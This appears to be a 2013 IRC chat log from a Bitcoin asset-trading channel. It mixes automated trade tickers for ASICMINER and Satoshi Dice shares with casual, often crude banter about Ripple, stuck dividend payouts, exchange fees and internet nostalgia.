22:55:16 rise! rise! May 22 22:56:00 [HAVELOCK] [ASICM] 20 @ 0.027 = 0.54 BTC [+] May 22 22:56:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.026239 BTC [+] May 22 22:57:24 [BTCTC] [ASICMINER-PT] 3 @ 2.46 = 7.38 BTC [-] May 22 22:58:00 [HAVELOCK] [SDICE] 1 @ 0.2308 BTC [+] May 22 22:59:00 [HAVELOCK] [ASICM] 2 @ 0.027 = 0.054 BTC [+] May 22 23:05:01 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [+] May 22 23:07:44 !ticker h asicm May 22 23:07:46 [HAVELOCK:ASICM] 1D: 0.02570000 / 0.02694794 / 0.02800000 (21698 shares, 584.71642825 BTC), 7D: 0.01650010 / 0.02163454 / 0.03000000 (127855 shares, 2766.08444822 BTC), 30D: 0.01290000 / 0.01957093 / 0.03000000 (187724 shares, 3673.93349271 BTC) May 22 23:08:00 [HAVELOCK] [ASICM] 3 @ 0.027 = 0.081 BTC [+] May 22 23:09:00 [HAVELOCK] [ASICM] 8 @ 0.027 = 0.216 BTC [+] May 22 23:09:14 ;;bc,convert eur May 22 23:09:14 1 BTC = 122.30500 U.S. dollars = 94.5608474 Euros May 22 23:11:58 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 22 23:13:01 [HAVELOCK] [ASICM] 3 @ 0.027 = 0.081 BTC [+] May 22 23:15:00 [HAVELOCK] [ASICM] 1 @ 0.02659998 BTC [-] May 22 23:15:02 [HAVELOCK] [ASICM] 49 @ 0.02699999 = 1.323 BTC [+] May 22 23:18:01 [HAVELOCK] [ASICM] 8 @ 0.02699999 = 0.216 BTC [+] May 22 23:19:24 !ticker h HIM May 22 23:19:26 [HAVELOCK:HIM] 1D: 2.11000000 / 2.18864297 / 2.50000000 (37 shares, 80.97979000 BTC), 7D: 1.52510000 / 2.01949691 / 2.60000000 (230 shares, 464.48429000 BTC), 30D: 1.44000000 / 1.98004089 / 2.60000000 (687 shares, 1360.28809173 BTC) May 22 23:20:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.0262 = 0.0786 BTC [-] May 22 23:22:00 [HAVELOCK] [ASICM] 2 @ 0.02699999 = 0.054 BTC [+] May 22 23:23:12 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] May 22 23:28:06 [BTCTC] [S.DICE-PT] 19 @ 0.00317 = 0.0602 BTC [-] May 22 23:28:46 [BTCTC] [BITVPS] 200 @ 0.000799 = 0.1598 BTC [+] May 22 23:29:00 [HAVELOCK] [ASICM] 76 @ 0.0269 = 2.0444 BTC [-] May 22 23:30:04 [HAVELOCK] [ASICM] 44 @ 0.0269 = 1.1836 BTC [-] May 22 23:32:01 [HAVELOCK] [ASICM] 37 @ 0.0269 = 0.9953 BTC [-] May 22 23:34:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.0261 = 0.0522 BTC [-] May 22 23:35:01 [HAVELOCK] [ASICM] 1 @ 0.02659998 BTC [-] May 22 23:35:02 [HAVELOCK] [ASICM] 50 @ 0.02650001 = 1.325 BTC [-] May 22 23:35:04 [HAVELOCK] [ASICM] 15 @ 0.02650001 = 0.3975 BTC [-] May 22 23:35:05 [HAVELOCK] [ASICM] 1 @ 0.0265 BTC [-] May 22 23:35:05 [HAVELOCK] [ASICM] 325 @ 0.0265 = 8.6125 BTC [-] May 22 23:35:06 [HAVELOCK] [ASICM] 10 @ 0.0265 = 0.265 BTC [-] May 22 23:35:07 [HAVELOCK] [ASICM] 30 @ 0.026001 = 0.78 BTC [-] May 22 23:36:30 Ripple is now a Tsunami! May 22 23:36:30 Just like that, Ripple's market cap now exceeds that of Bitcoin. There are a lot of people asking just what the heck is going on, and of course, trying to figure out if this is just another digital currency bubble. May 22 23:36:32 oh my. May 22 23:36:46 sauce http://www.thebitcointrader.com/2013/05/ripple-is-now-tsunami.html May 22 23:36:59 [BTCTC] [ASICMINER-PT] 4 @ 2.4226 = 9.6904 BTC [-] May 22 23:37:01 advertorial? May 22 23:37:04 lmao May 22 23:37:37 i buy xrp May 22 23:37:43 "We do know that the founders have retained 20 billion XRP, and that OpenCoin controls 80 billion XRP" May 22 23:37:45 lol May 22 23:38:18 anyone else gettign this bitcoin alarm spam May 22 23:38:26 dub , yes May 22 23:38:29 yes May 22 23:38:40 insta-ignored May 22 23:38:44 and the ripple exchange rate has been falling this week May 22 23:38:47 That brings the total number of "institutionally held" XRP to 99.42 billion. May 22 23:39:00 [HAVELOCK] [ASICM] 100 @ 0.0265 = 2.65 BTC [+] May 22 23:39:01 only 99.42 billion May 22 23:39:09 clearly the market cap is 1.3 bn May 22 23:39:23 there's 11mn bitcoin out of 11mn in circulation trading at 120 May 22 23:39:39 there's 50mn ripple (MORE THAN BITCOIN) in circulation not trading anywhere May 22 23:39:48 thus therefore... yeah! MORE THAN BITCOIB May 22 23:40:06 i cant wait to get rich off my free 40k ripples May 22 23:40:11 over 9000! May 22 23:40:19 Remember that Ripple's key investors have connections to PayPal and Dwolla, and will want to bring them on as Ripple Gateways. Such a move would boost Ripple's valuation well into the stratosphere, leaving Bitcoin behind as a beta-version afterthought. May 22 23:40:20 I sold mine as soon as I got them May 22 23:40:34 for 6000/1 May 22 23:40:35 totally dude. the dwolla fuckwits are going to leave bitcoin behind as an afterthought May 22 23:41:00 TAT I wish I could have waited like you May 22 23:41:05 I blew my ripple load prematurely May 22 23:41:06 ThickAsThieves i have a few $k lastime i checked... in btc that is May 22 23:41:15 yeah, no one but BTC people has ever heard of Dwolla May 22 23:41:17 not even sure how May 22 23:41:19 [BTCTC] [BITVPS] 11 @ 0.000799 = 0.0088 BTC [+] May 22 23:42:02 [HAVELOCK] [ASICM] 10 @ 0.0268 = 0.268 BTC [+] May 22 23:42:11 jborkl and what the btc people have heard of dwolla was that they scam on an unprecedented scale. May 22 23:42:37 Oh shit. May 22 23:42:56 I've just discovered BTC-E's minimum of 250 dollars on btc. May 22 23:43:00 [HAVELOCK] [VTX] 1 @ 0.41111 BTC [-] May 22 23:43:02 With paypal May 22 23:43:28 I guess I'll have to buy back. May 22 23:43:40 [BTCTC] [PAJKA.BOND] 2 @ 0.108987 = 0.218 BTC [-] May 22 23:44:00 [HAVELOCK] [ASICM] 180 @ 0.0264 = 4.752 BTC [-] May 22 23:44:01 [HAVELOCK] [ASICM] 500 @ 0.0263676 = 13.1838 BTC [-] May 22 23:44:01 its gonna be fun when gateways start collapsing May 22 23:44:02 [HAVELOCK] [ASICM] 40 @ 0.0262 = 1.048 BTC [-] May 22 23:44:03 [HAVELOCK] [ASICM] 125 @ 0.0261 = 3.2625 BTC [-] May 22 23:44:03 Yeah, bitbet - Ripple exchange rate is less than 20,000 ripple per BTC by the end of July May 22 23:44:04 [HAVELOCK] [ASICM] 7 @ 0.02600001 = 0.182 BTC [-] May 22 23:44:05 [HAVELOCK] [ASICM] 145 @ 0.02600001 = 3.77 BTC [-] May 22 23:44:33 see Willdude, I told you not to sell May 22 23:44:38 problem is , where is a reliable exchange price May 22 23:44:42 "selling ripple IOUs 0.1$ per 1$" May 22 23:45:14 I'll sell my ripples 100:1BTC May 22 23:45:26 til then I'm holding May 22 23:45:26 too high May 22 23:45:47 I can not even understand the logic of Ripple anyway. Bob can't pay mcdonalds, so he exchanges a IOU with Mary who has a trust level with Tim May 22 23:46:01 [HAVELOCK] [ASICM] 3 @ 0.026 = 0.078 BTC [-] May 22 23:46:13 so Tim now owes Mcdonalds for Bobs cheeseburger May 22 23:46:19 WTF May 22 23:46:26 but bob defaults May 22 23:46:38 [BTCTC] [TAT.ASICMINER] 18 @ 0.026 = 0.468 BTC [-] May 22 23:46:38 and he ate the cheeseburger May 22 23:46:53 and tim defaults May 22 23:46:58 cause he gave ious to 10 bobs May 22 23:47:03 Haha May 22 23:47:10 I'm buying shares back. May 22 23:47:12 so who is the bagholder at the end? May 22 23:47:18 donald. May 22 23:47:58 See, the logic chain fails May 22 23:48:08 [BTCTC] [ASICMINER-PT] 1 @ 2.4225 BTC [-] May 22 23:48:24 someone is getting fucked, but no telling who May 22 23:48:49 last one in line at Mcdonalds I guess, or maybe the rancher that sold Mcdonalds the cow May 22 23:48:58 BTCTC comes back, one order fires, 500 people try to load website and crash it, rinse & repeat! May 22 23:49:03 Well, if I buy back, I've only lost 1 share, with a third of the price of one left over. May 22 23:49:13 Maybe I'll just forget I have these BTC. May 22 23:49:23 or if you just hold the BTC you lose even less May 22 23:49:23 Well, shares. May 22 23:49:34 So annoyed. May 22 23:49:38 which was our original recommendation May 22 23:49:48 learn to learn May 22 23:49:49 :P May 22 23:50:28 So do wire transfers from exchanges have a fee? May 22 23:50:35 of course they do May 22 23:50:35 Experience is a high price to pay for wisdom. May 22 23:50:40 My bank charges £13 May 22 23:50:52 Most people insist on paying it May 22 23:50:57 then who was divs? May 22 23:51:19 And since I can't actually get any way to efficiently sell my BTC, I'm fucked. May 22 23:51:27 So I might as well keep them. May 22 23:51:35 WILLdude: you are not fucked if you learned something! May 22 23:51:39 came back after 4 hrs. dat scrollback. gods. May 22 23:51:40 haha May 22 23:51:53 if you didn't, then yes, you are very fucked May 22 23:51:56 I'll keep them in the shares for a while. May 22 23:52:25 willdude i can prolly send you these few euros in envelope May 22 23:52:29 can anyone else access btct? May 22 23:52:37 no May 22 23:52:45 fiat500, I can. they probably just banned you May 22 23:52:48 :) May 22 23:52:57 i can access once in a while May 22 23:52:58 but I have no idea if trades are working May 22 23:52:59 for varing values of access May 22 23:53:01 and almost place an order May 22 23:53:12 cloudfart says "this website is offline" May 22 23:53:17 jurov: What do you mean? May 22 23:53:22 had that on and off for the past couple hours or so May 22 23:53:40 dude you want to sell bitcoins and get fiat, no? May 22 23:53:47 has AM-PT paid divs yet? May 22 23:53:54 jurov: he cant have me May 22 23:54:02 jurov: i do right now May 22 23:54:18 wat May 22 23:54:31 i have a fiat shortage May 22 23:54:37 atm May 22 23:54:54 oh not a trading channel, whoops :P May 22 23:54:54 only TAT AM PTs have paid divs May 22 23:55:07 everyone else is waiting for AM's freshly minted coins to confirm May 22 23:55:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.026 = 0.52 BTC [-] May 22 23:55:15 ah May 22 23:55:34 I knew they would derp something up with solo mining May 22 23:55:46 AM pays fresh coins out??? May 22 23:56:01 [HAVELOCK] [ASICM] 2 @ 0.0264 = 0.0528 BTC [+] May 22 23:56:02 [HAVELOCK] [ASICM] 5 @ 0.0264 = 0.132 BTC [+] May 22 23:56:03 they should have kept them and pay something other May 22 23:56:07 they just started solo so presumably they'll have to May 22 23:56:07 ThickAsThieves: oh, thanks May 22 23:56:11 you are benevolent May 22 23:56:14 and sell them on silk road May 22 23:56:30 thank you for the.. 0.016 btc you sent me early May 22 23:56:31 you can get more for fresh coin? May 22 23:56:31 lulz May 22 23:56:44 There is one option left, I guess. May 22 23:56:48 i heard yes, they have no history May 22 23:57:47 [BTCTC] [ASICMINER-PT] 2 @ 2.626 = 5.252 BTC [+] May 22 23:57:52 and no taint May 22 23:58:09 heh, taint May 22 23:59:20 tried coming off pain meds yesterday, bad idea May 22 23:59:56 Hmm.. May 23 00:00:17 Don't know if I should go to a slightly more expensive exchange or to reinvest. May 23 00:01:17 But dammit, I don't think there is any way really to sell btc for gbp. No exchanges do bank deposits. May 23 00:01:28 Wire is too expensive. May 23 00:01:35 PayPal is too risky. May 23 00:01:50 I'm starting to think I should just buy porn with it. :) May 23 00:01:53 KJ May 23 00:01:55 *KJ May 23 00:01:59 *JK May 23 00:01:59 **KJ May 23 00:02:05 ***JK May 23 00:02:17 chill May 23 00:02:30 dub, solo mining should have nothing to do with this May 23 00:02:47 solo solo solo May 23 00:02:56 liquid honey blocks May 23 00:02:58 So May 23 00:03:03 What to do. May 23 00:03:06 sex May 23 00:03:06 jborkl: sounds liek they tried to spend coins before 120 confirms May 23 00:03:13 buy back in WILLdude May 23 00:03:13 you cant May 23 00:03:18 WILLdude #bitcoin-trollbox May 23 00:03:22 it is locked in immature balance May 23 00:03:23 lol May 23 00:03:48 dub i've detox'd from fentanyl twice now May 23 00:03:52 there is light at the end May 23 00:04:16 jcpham: its not the detox its the pain May 23 00:04:17 if you spend it they will come May 23 00:04:34 ohhhhhh May 23 00:04:41 smoke weed erryday May 23 00:05:36 +1 jcpham May 23 00:05:42 works for hangovers, detox May 23 00:05:48 butthurt miners May 23 00:05:56 not so good for broken bones May 23 00:06:01 [HAVELOCK] [ASICM] 1 @ 0.02639 BTC [-] May 23 00:07:01 [HAVELOCK] [ASICM] 25 @ 0.02639 = 0.6598 BTC [-] May 23 00:07:02 [HAVELOCK] [ASICM] 4 @ 0.02639 = 0.1056 BTC [-] May 23 00:07:12 if you have broken bones, you get the good stuff, which i think is actual root of problem? May 23 00:07:16 WILLdude: i thought maybe bitcurex prepaid card may help you but they are under maint: http://shop.bitcurex.com May 23 00:07:35 and it's likely too expensive initially for you May 23 00:08:00 [HAVELOCK] [ASICM] 90 @ 0.02639 = 2.3751 BTC [-] May 23 00:08:02 so just wait these few years May 23 00:08:03 just use gaystamp May 23 00:08:21 got tramadol, problem being after a few days the pain is completely gone so dub stops taking them May 23 00:08:48 did you try acupunture? May 23 00:09:21 tramadol i heard kids are abusing ultram these days May 23 00:09:25 No. May 23 00:09:28 Actually May 23 00:09:32 if you take enough it makes you drowsy i think May 23 00:09:32 I'm selling. May 23 00:09:49 tramadol is fine May 23 00:09:54 I might buy into BTC again, but it's taking my life over. May 23 00:09:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.025801 = 0.129 BTC [-] May 23 00:09:59 stop breaking the bones friend May 23 00:10:44 i think like 20 US states have passed weed laws now May 23 00:10:53 willdude tomorrow you'll come you want to get back in May 23 00:10:54 awkwardsituation May 23 00:11:00 [HAVELOCK] [ASICM] 33 @ 0.0264 = 0.8712 BTC [+] May 23 00:11:52 erryone should join #bitcoin-trollbox May 23 00:12:06 I made a bitcoin bootup paste May 23 00:12:17 I want to ban myself from havelock after this, on every day except wednesday. May 23 00:12:27 good idea May 23 00:12:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0258 BTC [-] May 23 00:12:36 ;join #bitcoin-trollbox May 23 00:12:43 herp May 23 00:12:54 derp May 23 00:13:02 eek May 23 00:13:14 I almost have enough for 12 shares. May 23 00:13:20 But not enough. May 23 00:13:29 I'll put in the best bid I can. May 23 00:14:00 [HAVELOCK] [ASICM] 21 @ 0.0264 = 0.5544 BTC [+] May 23 00:14:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.025801 BTC [+] May 23 00:15:18 BTC is on it's way back. May 23 00:15:45 I learnt a lot from that, and it only cost me 0.026 btc! May 23 00:16:08 on its way back from what? May 23 00:16:15 [BTCTC] [TAT.ASICMINER] 31 @ 0.0258 = 0.7998 BTC [-] May 23 00:16:17 [BTCTC] [TAT.ASICMINER] 8 @ 0.0258 = 0.2064 BTC [-] May 23 00:16:40 [BTCTC] [TAT.ASICMINER] 11 @ 0.02574 = 0.2831 BTC [-] May 23 00:17:00 [HAVELOCK] [ASICM] 60 @ 0.026 = 1.56 BTC [-] May 23 00:17:02 [HAVELOCK] [ASICM] 36 @ 0.0259 = 0.9324 BTC [-] May 23 00:17:03 [HAVELOCK] [ASICM] 85 @ 0.0258 = 2.193 BTC [-] May 23 00:17:03 [HAVELOCK] [ASICM] 100 @ 0.0258 = 2.58 BTC [-] May 23 00:17:25 [BTCTC] [TAT.ASICMINER] 40 @ 0.025731 = 1.0292 BTC [-] May 23 00:17:46 [BTCTC] [ASICMINER-PT] 1 @ 2.597 BTC [-] May 23 00:18:00 [HAVELOCK] [ASICM] 5 @ 0.0258 = 0.129 BTC [-] May 23 00:18:02 [HAVELOCK] [ASICM] 5 @ 0.0256 = 0.128 BTC [-] May 23 00:18:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.025801 BTC [+] May 23 00:19:06 [BTCTC] [ASICMINER-PT] 4 @ 2.5979 = 10.3916 BTC [+] May 23 00:21:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.02575 = 0.1288 BTC [-] May 23 00:21:15 [BTCTC] [TAT.ASICMINER] 7 @ 0.025731 = 0.1801 BTC [-] May 23 00:23:01 [HAVELOCK] [ASICM] 10 @ 0.0264 = 0.264 BTC [+] May 23 00:24:00 [HAVELOCK] [ASICM] 8 @ 0.0264 = 0.2112 BTC [+] May 23 00:24:01 [HAVELOCK] [ASICM] 1 @ 0.0264 BTC [+] May 23 00:24:12 Hello again. May 23 00:24:43 /o\ May 23 00:25:10 What exactly does that emoticon stand for? May 23 00:25:20 gasp May 23 00:25:27 Willdude , you talk too much May 23 00:25:33 ;;ticker May 23 00:25:34 BTCUSD ticker | Best bid: 123.00001, Best ask: 123.09999, Bid-ask spread: 0.09998, Last trade: 123.09999, 24 hour volume: 16102.49463456, 24 hour low: 122.00000, 24 hour high: 123.70000, 24 hour vwap: 122.80501 May 23 00:25:35 not to be a asshole May 23 00:25:43 Haha. Just found out this guy in the year above me got someone pregnant. May 23 00:25:57 year above? you're in school? May 23 00:25:59 quaint May 23 00:26:00 [HAVELOCK] [SDICE] 2 @ 0.2308 = 0.4616 BTC [+] May 23 00:26:01 dude it's facepalm May 23 00:26:05 lol May 23 00:26:11 Oh sorry. May 23 00:26:18 Willdude123: why do you have a wikipedia hostmask? May 23 00:26:18 I apologize for being alive. May 23 00:26:25 I THOUGHT THIS WAS AMERICA May 23 00:26:39 NO THIS IS SPARTA May 23 00:26:44 no..this is TEH INTERNETZ May 23 00:26:51 shutup. May 23 00:26:52 fiat500 yea he's in school, we've been through all this during tuesday grilling session May 23 00:26:55 grep the logs May 23 00:26:59 lmfao May 23 00:27:00 [HAVELOCK] [ASICM] 26 @ 0.0264 = 0.6864 BTC [+] May 23 00:27:11 i see what you meant now about fucking a girl his age May 23 00:27:27 dub, guess May 23 00:27:38 Did I: May 23 00:28:00 [HAVELOCK] [SDICE] 3 @ 0.23089999 = 0.6927 BTC [+] May 23 00:28:07 a) Ask for one, and got one, with me having no affiliation with wp at all? May 23 00:28:30 b) Get one because I sometimes edit wikipedia? May 23 00:28:34 [BTCTC] [TAT.ASICMINER] 28 @ 0.02579 = 0.7221 BTC [+] May 23 00:28:51 Willdude123: they are doing some kind of adopt-a-retard program? May 23 00:28:51 dude how does editing wikipedia qualify you to trade and troll? May 23 00:28:59 [HAVELOCK] [ASICM] 18 @ 0.0264 = 0.4752 BTC [+] May 23 00:29:01 [HAVELOCK] [ASICM] 482 @ 0.0265 = 12.773 BTC [+] May 23 00:29:04 Wtf? May 23 00:29:05 HELLO THIS IS DOG May 23 00:29:14 [BTCTC] [BITVPS] 2 @ 0.000799 = 0.0016 BTC [+] May 23 00:29:15 wrong room May 23 00:29:20 I am 11 and what is this May 23 00:29:42 11 is the new 12 May 23 00:29:55 Willdude123: basically you don't have to cope with emotions and ego on wikipedia (or you can pretend not to) May 23 00:30:01 [HAVELOCK] [ASICM] 18 @ 0.0264 = 0.4752 BTC [-] May 23 00:30:02 here they'll get you May 23 00:30:19 brutally May 23 00:30:42 dub: What exactly about my behaviour leads you to believe that I am a 'retard'? May 23 00:30:57 this guessing game among other things, will. May 23 00:31:01 [HAVELOCK] [SDICE] 3 @ 0.23189999 = 0.6957 BTC [+] May 23 00:31:01 jurov, you really do May 23 00:31:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.025732 BTC [-] May 23 00:31:14 Willdude123 don't panic. being young is good enough. May 23 00:31:15 You get arrogant people bullying new users. May 23 00:31:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.025731 = 0.0772 BTC [-] May 23 00:31:29 Willdude123: cuz you panic everyday May 23 00:32:19 Oh yeah, can someone ban me, and then unban me and ban me etc on request here? May 23 00:32:26 you seem to unable to just buy something and stick to it for extended perion May 23 00:32:29 "There's good reason to believe the dividend payouts are going to be rather steady for a few more years." May 23 00:32:34 guess who said this and about what. May 23 00:32:45 TAT? May 23 00:32:45 Willdude123 kinda hard to get banned really. May 23 00:32:53 ASICM May 23 00:33:14 [MPEX] [S.MPOE] 9150 @ 0.00067979 = 6.2201 BTC [-] May 23 00:33:16 [BTCTC] [TAT.ASICMINER] 78 @ 0.02563 = 1.9991 BTC [-] May 23 00:33:52 [BTCTC] [TAT.ASICMINER] 13 @ 0.025699 = 0.3341 BTC [+] May 23 00:35:00 [HAVELOCK] [ASICM] 8 @ 0.0265 = 0.212 BTC [+] May 23 00:35:12 [BTCTC] [ASICMINER-PT] 1 @ 2.5949 BTC [-] May 23 00:36:04 [HAVELOCK] [ASICM] 1 @ 0.02637214 BTC [-] May 23 00:38:00 [HAVELOCK] [ASICM] 1 @ 0.0265 BTC [+] May 23 00:46:00 [HAVELOCK] [ASICM] 25 @ 0.0265 = 0.6625 BTC [+] May 23 00:49:27 a few more years May 23 00:49:48 lol newbiejail.org .. similar thing for trust is to be expected soon May 23 00:50:33 aka selling your btctalk cookie for 0.01 BTC May 23 00:51:42 what do you think about the legal situation of mtgox atm? How do you estimate the risk? May 23 00:53:00 [HAVELOCK] [ASICM] 100 @ 0.0265 = 2.65 BTC [+] May 23 00:54:01 [HAVELOCK] [ASICM] 3 @ 0.0265 = 0.0795 BTC [+] May 23 00:54:02 2.7 May 23 00:54:04 Oh, SD is having a really bad day May 23 00:54:18 worse than yesterday? May 23 00:54:18 Bad doesn't even start to cover it. May 23 00:54:35 fuck yeah bad day May 23 00:54:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.025749 BTC [+] May 23 00:55:27 fiat500, do you have to worry about account bans in the future? May 23 00:55:58 b0n1: what were you able to glean out of that 2.7 figure i pulled out of my ass? May 23 00:56:06 whoa -2800 May 23 00:56:25 sdice brokd giving free money May 23 00:56:29 so , are all the AM divs in a logjam still ? or did some get through? May 23 00:57:00 Not TAT , since he paid his PT himself May 23 00:57:09 goodguyTAT May 23 00:57:23 kakobrekla: wat May 23 00:57:31 mine are still unconfirmed May 23 00:58:01 0% network propagation too according to blockchain May 23 00:58:20 did they doublespend them all or some shit? May 23 00:58:30 finally, Satoshi dice can get some press again! May 23 00:58:31 ;;tslb May 23 00:58:35 Time since last block: 4 minutes and 35 seconds May 23 00:58:53 what happened to sdice? May 23 00:59:16 bad month May 23 00:59:28 last 2 days , really rough May 23 00:59:37 oh, any other news in the last 24hours? May 23 00:59:51 AM divs are stuck in a shitpile May 23 01:00:00 [HAVELOCK] [ASICM] 1 @ 0.0264 BTC [-] May 23 01:00:02 but no May 23 01:00:08 not much else May 23 01:00:35 what does mean 'shitpile'? May 23 01:00:57 rip s.dice May 23 01:01:15 hi May 23 01:01:36 benkay: is pile of shits May 23 01:01:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.02563 = 0.0513 BTC [-] May 23 01:01:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.02562 = 0.2306 BTC [-] May 23 01:01:54 [BTCTC] [TAT.ASICMINER] 58 @ 0.02561 = 1.4854 BTC [-] May 23 01:01:59 fiat500: as in div is shit and small? May 23 01:02:06 https://blockchain.info/tx/a49d03be33c6bcdfb91e2e13235551ab553c20c852dfd0f5f7d8c36f83dd8a69 May 23 01:02:13 defenition of shitpile May 23 01:02:21 definition May 23 01:03:25 is there something special about a shitpile or is this tx just taking forever to confirm for some hilaribad reason? May 23 01:04:19 we will see when it clears up May 23 01:04:28 got my divs fine May 23 01:04:31 samtronthewardialer May 23 01:04:32 probably nothing special May 23 01:04:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.02561 = 0.3073 BTC [-] May 23 01:04:39 [BTCTC] [TAT.ASICMINER] 82 @ 0.0256 = 2.0992 BTC [-] May 23 01:04:41 destroyer of worlds May 23 01:04:56 is what I named my first fragging quake pc May 23 01:06:08 [BTCTC] [ASICMINER-PT] 1 @ 2.591 BTC [-] May 23 01:06:10 [BTCTC] [ASICMINER-PT] 1 @ 2.592 BTC [+] May 23 01:06:12 [BTCTC] [ASICMINER-PT] 1 @ 2.593 BTC [+] May 23 01:07:00 anybody ever war dial back in the day? May 23 01:07:56 lol someone war dialed me once. I talked to them May 23 01:08:21 War dialing - Wikipedia, the free encyclopedia: ; Urban Dictionary: war dial: ; War Dialers - Internet Security Systems: May 23 01:08:48 this is like pre-internet May 23 01:09:49 Lizardbitcoin, what did he say? May 23 01:10:00 good conversationalist>? May 23 01:11:15 no .. it was like 2 minutes.. like Hi Joe (my friend whom i was expecting to call me) May 23 01:11:33 then he was like I'm not joe... well who are you... don't remember too much more I was 11 May 23 01:11:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.025749 = 0.206 BTC [+] May 23 01:12:20 [BTCTC] [ASICMINER-PT] 1 @ 2.593 BTC [+] May 23 01:12:34 [BTCTC] [ASICMINER-PT] 1 @ 2.595 BTC [+] May 23 01:12:43 all the leet haxors war dial by hand May 23 01:13:22 [BTCTC] [ASICMINER-PT] 1 @ 2.596 BTC [+] May 23 01:13:48 [BTCTC] [TAT.ASICMINER] 8 @ 0.02575 = 0.206 BTC [+] May 23 01:13:54 I got a few pissed off call backs when I tried war dialing as a kid. Parents had no idea what they were talking about and it turned into a bitchfest. I sat there trying to stifle my laughter. May 23 01:14:00 [MPEX] [S.MPOE] 3700 @ 0.0006784 = 2.5101 BTC [-] May 23 01:14:35 [BTCTC] [TAT.ASICMINER] 78 @ 0.02576 = 2.0093 BTC [+] May 23 01:14:57 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] May 23 01:16:04 aww man I remember logging into various bbs May 23 01:16:19 [BTCTC] [GSDPT] 9 @ 0.00285 = 0.0257 BTC [+] May 23 01:16:32 today is internet nostalgia day on -assets. May 23 01:16:40 no May 23 01:16:47 scuse me, tech nostalgia. May 23 01:16:57 I ran a fidonet node May 23 01:17:08 May 23 01:17:55 its internet nostalgia day on #bitcoin-trollbox May 23 01:18:03 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [-] May 23 01:18:35 Why is havelock suddenly introducing a trading fee? May 23 01:19:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02576 = 0.0515 BTC [+] May 23 01:19:43 another question might be why would any exchange not charge a trading fee? May 23 01:19:48 yeah.. May 23 01:20:48 hey lulz May 23 01:20:59 butterfly labs hires a new ceo to improve their image May 23 01:21:06 willdude, the world is just trying to fund more ways to punish you May 23 01:22:41 [BTCTC] [ASICMINER-PT] 1 @ 2.5451 BTC [-] May 23 01:22:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.025776 BTC [+] May 23 01:22:58 [BTCTC] [ASICMINER-PT] 1 @ 2.545 BTC [-] May 23 01:23:03 So do you guys thing ASICMINER-PT is overvalued? May 23 01:23:19 depends who you ask May 23 01:23:29 do you? May 23 01:23:42 [BTCTC] [B.YABMC] 4 @ 0.01492 = 0.0597 BTC [-] May 23 01:23:59 i think its overvalued in the sense that the price is too high May 23 01:24:13 Well I am not sure if my equation is missing something May 23 01:24:17 but undervalued because i think people are going to value it even higher before/if it crashes May 23 01:24:18 [BTCTC] [TAT.ASICMINER] 60 @ 0.02576 = 1.5456 BTC [-] May 23 01:24:26 i mean it's like 3k for 5 ghs right? May 23 01:24:32 right now May 23 01:24:39 5 wat? May 23 01:24:44 the lord works in mysterious ways May 23 01:25:12 Well I read that ASICMINER is trying to get up to 230 THs right? May 23 01:25:16 an AM share isnt a specific amount of ghs May 23 01:25:33 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] May 23 01:25:38 I understand the correlation isn't 1-1 May 23 01:25:39 they wont put 200+TH online til more people are hashing than themselves May 23 01:25:53 imo May 23 01:25:54 I understand that too May 23 01:26:01 well that would tank the value of btc May 23 01:26:10 [BTCTC] [TAT.ASICMINER] 33 @ 0.025776 = 0.8506 BTC [+] May 23 01:26:11 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] May 23 01:26:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.02576 = 0.5152 BTC [-] May 23 01:27:13 ? May 23 01:27:28 lol May 23 01:27:39 Liz, it doesnt work that way May 23 01:27:42 that would put them firmly over 50% invoking the dreaded 51% fear auto sell mtgox bots May 23 01:27:51 well May 23 01:27:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.02521 = 0.0756 BTC [-] May 23 01:27:57 [BTCTC] [TAT.ASICMINER] 132 @ 0.0252 = 3.3264 BTC [-] May 23 01:28:05 thats why they are selling hardware May 23 01:28:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.02519 = 0.6298 BTC [-] May 23 01:28:24 they can make money either way May 23 01:28:28 lol someone's got to do it if BFL wont May 23 01:28:34 SDICE Profit This Month: -2809.39847788 BTC May 23 01:28:36 ouchie May 23 01:28:51 LOL May 23 01:28:54 whale is back? May 23 01:29:00 long live whale May 23 01:29:01 with a vengeance May 23 01:29:02 how does a casino lose money? May 23 01:29:11 holes in its pockets May 23 01:29:18 by being provably fair May 23 01:29:25 its bound to happen May 23 01:29:32 here's how May 23 01:29:39 provablyfailed May 23 01:29:44 the owner takes all the income May 23 01:29:47 they can hash at differrnt pools. so 51 percent is a point of view in some ways May 23 01:29:48 and keeps betting it May 23 01:29:49 its got holes in its pocketses, precious May 23 01:29:55 ThickAsThieves: heh May 23 01:29:59 until he racks up the share pric May 23 01:30:00 e May 23 01:30:01 then May 23 01:30:06 he sells more shares May 23 01:30:08 like say May 23 01:30:10 you really think evoorhes is putting the income back into the game? May 23 01:30:10 3 million more May 23 01:30:10 jborkl: yeah, they could already be '51%'ing now May 23 01:30:14 then May 23 01:30:19 [BTCTC] [TAT.ASICMINER] 44 @ 0.025776 = 1.1341 BTC [+] May 23 01:30:23 he waits a while May 23 01:30:31 and starts betting all the income again May 23 01:30:34 except this time May 23 01:30:38 til he actually wins May 23 01:30:47 thus syphoning all the money out for himself May 23 